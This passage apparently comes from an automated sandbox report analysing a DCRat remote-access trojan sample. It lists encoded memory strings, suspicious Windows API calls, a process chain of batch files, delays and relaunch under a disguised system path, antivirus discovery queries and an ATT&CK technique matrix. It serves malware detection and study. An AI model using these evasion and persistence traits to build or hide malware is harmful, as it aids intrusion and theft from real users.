Q+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]`v
Source: k1iZHyRK6K.exe, 00000000.00000002.1709544106.000000001BB61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA
Source: lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1801791876.000000001285D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]] ~
Source: k1iZHyRK6K.exe, 0000002F.00000002.2043589025.00000000124AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
Source: k1iZHyRK6K.exe, 00000000.00000002.1714781862.000000001BCB1000.00000004.00000020.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1829405136.000000001B051000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000029.00000002.1867809457.000002014A927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: k1iZHyRK6K.exe, Class73.cs	Reference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
Source: k1iZHyRK6K.exe, Class74.cs	Reference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
Source: k1iZHyRK6K.exe, AFA.cs	Reference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 \| A86.U14.flag_1, A86.OkN.flag_2)

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5941.tmp" "c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\k1iZHyRK6K.exe "C:\Users\user\Desktop\k1iZHyRK6K.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe VolumeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Users\user\Desktop\k1iZHyRK6K.exe VolumeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1829405136.000000001B051000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s Defender\MsMpeng.exe
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1829405136.000000001B02B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: k1iZHyRK6K.exe, type: SAMPLE
Source: Yara match	File source: 0.0.k1iZHyRK6K.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640485684.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k1iZHyRK6K.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: k1iZHyRK6K.exe, type: SAMPLE
Source: Yara match	File source: 0.0.k1iZHyRK6K.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640485684.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k1iZHyRK6K.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	241 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	35 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	133 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	151 Virtualization/Sandbox Evasion	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
